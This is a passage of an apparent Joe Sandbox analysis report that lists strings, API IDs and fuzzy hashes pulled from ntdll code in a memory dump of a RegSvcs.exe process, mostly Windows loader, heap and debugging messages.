                                                                                              • *** enter .exr %p for the exception record, xrefs: 01098FA1
                                                                                              • The instruction at %p tried to %s , xrefs: 01098F66
                                                                                              • <unknown>, xrefs: 01098D2E, 01098D81, 01098E00, 01098E49, 01098EC7, 01098F3E
                                                                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01098E3F
                                                                                              • a NULL pointer, xrefs: 01098F90
                                                                                              • This failed because of error %Ix., xrefs: 01098EF6
                                                                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01098DD3
                                                                                              • *** then kb to get the faulting stack, xrefs: 01098FCC
                                                                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01098D8C
                                                                                              • The resource is owned exclusively by thread %p, xrefs: 01098E24
                                                                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01098FEF
                                                                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01098DB5
                                                                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01098E86
                                                                                              • *** An Access Violation occurred in %ws:%s, xrefs: 01098F3F
                                                                                              • write to, xrefs: 01098F56
                                                                                              • Go determine why that thread has not released the critical section., xrefs: 01098E75
                                                                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01098F34
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                              • API String ID: 0-108210295
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-2160512332
                                                                                              Strings
                                                                                              • Address of the debug info found in the active list., xrefs: 010554AE, 010554FA
                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0105540A, 01055496, 01055519
                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010554E2
                                                                                              • Thread identifier, xrefs: 0105553A
                                                                                              • 8, xrefs: 010552E3
                                                                                              • Critical section debug info address, xrefs: 0105541F, 0105552E
                                                                                              • Critical section address, xrefs: 01055425, 010554BC, 01055534
                                                                                              • double initialized or corrupted critical section, xrefs: 01055508
                                                                                              • Invalid debug info address of this critical section, xrefs: 010554B6
                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01055543
                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010554CE
                                                                                              • undeleted critical section in freed memory, xrefs: 0105542B
                                                                                              • Critical section address., xrefs: 01055502
                                                                                              • corrupted critical section, xrefs: 010554C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                              • API String ID: 0-2368682639
                                                                                              Strings
                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010525EB
                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010522E4
                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01052602
                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01052624
                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010524C0
                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01052412
                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01052498
                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0105261F
                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01052506
                                                                                              • @, xrefs: 0105259B
                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01052409
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                              • API String ID: 0-4009184096
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                              • API String ID: 0-2515994595
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                              • API String ID: 0-1700792311
                                                                                              Strings
                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 01068B8F
                                                                                              • VerifierFlags, xrefs: 01068C50
                                                                                              • HandleTraces, xrefs: 01068C8F
                                                                                              • VerifierDebug, xrefs: 01068CA5
                                                                                              • VerifierDlls, xrefs: 01068CBD
                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01068A67
                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01068A3D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                              • API String ID: 0-3223716464
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                              • API String ID: 0-1109411897
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                              Strings
                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01039A2A
                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010399ED
                                                                                              • apphelp.dll, xrefs: 00FD6496
                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01039A01
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01039A11, 01039A3A
                                                                                              • LdrpInitShimEngine, xrefs: 010399F4, 01039A07, 01039A30
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                              Strings
                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 01052160, 0105219A, 010521BA
                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01052178
                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01052180
                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0105219F
                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010521BF
                                                                                              • SXS: %s() passed the empty activation context, xrefs: 01052165
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                              Strings
                                                                                              • LdrpInitializeProcess, xrefs: 0101C6C4
                                                                                              • LdrpInitializeImportRedirection, xrefs: 01058177, 010581EB
                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01058181, 010581F5
                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 01058170
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0101C6C3
                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 010581E5
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                              APIs
                                                                                                • Part of subcall function 01022DF0: LdrInitializeThunk.NTDLL ref: 01022DFA
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01020BA3
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01020BB6
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01020D60
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01020D74
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                              • String ID:
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                              Strings
                                                                                              • @, xrefs: 01018591
                                                                                              • LdrpInitializeProcess, xrefs: 01018422
                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0101855E
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01018421
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                              Strings
                                                                                              • .Local, xrefs: 010128D8
                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010522B6
                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010521D9, 010522B1
                                                                                              • SXS: %s() passed the empty activation context, xrefs: 010521DE
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                              Strings
                                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01053437
                                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0105342A
                                                                                              • RtlDeactivateActivationContext, xrefs: 01053425, 01053432, 01053451
                                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01053456
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                              Strings
                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0104106B
                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01040FE5
                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010410AE
                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01041028
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                              Strings
                                                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0105362F
                                                                                              • LdrpFindDllActivationContext, xrefs: 01053636, 01053662
                                                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 01053640, 0105366C
                                                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 0105365C
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                              Strings
                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0104A992
                                                                                              • LdrpDynamicShimModule, xrefs: 0104A998
                                                                                              • apphelp.dll, xrefs: 01002462
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0104A9A2
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                              Strings
                                                                                              • HEAP[%wZ]: , xrefs: 00FF3255
                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00FF327D
                                                                                              • HEAP: , xrefs: 00FF3264
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $@
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                              Strings
                                                                                              • LdrpCheckModule, xrefs: 0104A117
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0104A121
                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 0104A10F
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                              Strings
                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00FDCD34
                                                                                              • InstallLanguageFallback, xrefs: 00FDCD7F
                                                                                              • @, xrefs: 00FDCD63
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                              Strings
                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 010582DE
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 010582E8
                                                                                              • Failed to reallocate the system dirs string !, xrefs: 010582D7
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                              Strings
                                                                                              • PreferredUILanguages, xrefs: 0109C212
                                                                                              • @, xrefs: 0109C1F1
                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0109C1C5
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                              Strings
                                                                                              • LdrpCheckRedirection, xrefs: 0106488F
                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01064899
                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01064888
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                              Strings
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01062104
                                                                                              • LdrpInitializationFailure, xrefs: 010620FA
                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 010620F3
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: #%u
                                                                                              Strings
                                                                                              • LdrResSearchResource Exit, xrefs: 00FEAA25
                                                                                              • LdrResSearchResource Enter, xrefs: 00FEAA13
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: `$`
                                                                                              • API String ID: 0-197956300
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: Legacy$UEFI
                                                                                              • API String ID: 2994545307-634100481
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$MUI
                                                                                              • API String ID: 0-17815947
                                                                                              Strings
                                                                                              • kLsE, xrefs: 00FE0540
                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00FE063D
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                              • API String ID: 0-2547482624
                                                                                              Strings
                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 00FEA2FB
                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 00FEA309
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                              • API String ID: 0-2876891731
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                              • API String ID: 2994545307-4008356553
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: MUI
                                                                                              • API String ID: 0-1339004836
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3916222277
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3916222277
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: GlobalTags
                                                                                              • API String ID: 0-1106856819
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .mui
                                                                                              • API String ID: 0-1199573805
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: EXT-
                                                                                              • API String ID: 0-1948896318
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: BinaryHash
                                                                                              • API String ID: 0-2202222882
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #
                                                                                              • API String ID: 0-1885708031
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: BinaryName
                                                                                              • API String ID: 0-215506332
                                                                                              Strings
                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0106895E
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                              • API String ID: 0-702105204
                                                                                              • Opcode ID: 98ef5f41f6455d67f803f0fa9f92cd13deebbcb1b430725f1fb6ce48cf2aac70
                                                                                              • Instruction ID: df0c69c93922b49cd876a7ec445712d5ff268155a54d2ad9f1c08e98c8524f46
                                                                                              • Opcode Fuzzy Hash: 98ef5f41f6455d67f803f0fa9f92cd13deebbcb1b430725f1fb6ce48cf2aac70
                                                                                              • Instruction Fuzzy Hash: 6501F7312013019FE6345E55DC85B6A7BA9EF86394B0C002EFAC106552CB25A844C7A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2bab21986c062ff52b28b6925739f90305a0d51e80fcfc17c351308f26c1cc79
                                                                                              • Instruction ID: be67b11fcb25e7f5ff7dfe57bc77d38da0299abc1cd7842b0655f1076c05e1d0
                                                                                              • Opcode Fuzzy Hash: 2bab21986c062ff52b28b6925739f90305a0d51e80fcfc17c351308f26c1cc79
                                                                                              • Instruction Fuzzy Hash: B1818471A00609DFDB56CFA9C880BEEBBF9FF48314F108429E995A7254D734AC45CB60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4333b5e99016d76bf72ae29e219018fd33aed0c710cecec91cfa5c15de038b24
                                                                                              • Instruction ID: 89942795cc7a576a48ab6abd626ae1ce2aefc6d4c9569c01bfd5a0e06919531e
                                                                                              • Opcode Fuzzy Hash: 4333b5e99016d76bf72ae29e219018fd33aed0c710cecec91cfa5c15de038b24
                                                                                              • Instruction Fuzzy Hash: 7071E2B6C05629DBCB259F98C5807BEBBF0FF48710F14856AE982AB350D3349800DB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e60460465c52301b036961ebf1f5feb5821262c263c5d2b981ea1d23f6bbd758
                                                                                              • Instruction ID: 59d25295548a63b80add96e0d9b46e7e1fe2b23237e52ecefb421f07c3e4f4ca
                                                                                              • Opcode Fuzzy Hash: e60460465c52301b036961ebf1f5feb5821262c263c5d2b981ea1d23f6bbd758
                                                                                              • Instruction Fuzzy Hash: 9971AD74D042669FCB15DF59C844ABABBF5EF49300F08C4AAE9D8DB201E335EA45C7A4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1a1f453f6ed5ec8010c34d3465837f934482469adcc4d7d7809aab4ae520bf35
                                                                                              • Instruction ID: bda44fa505bdc8f5382dccd812b43a2523777eb863a305cbfe3a426c054bf9b8
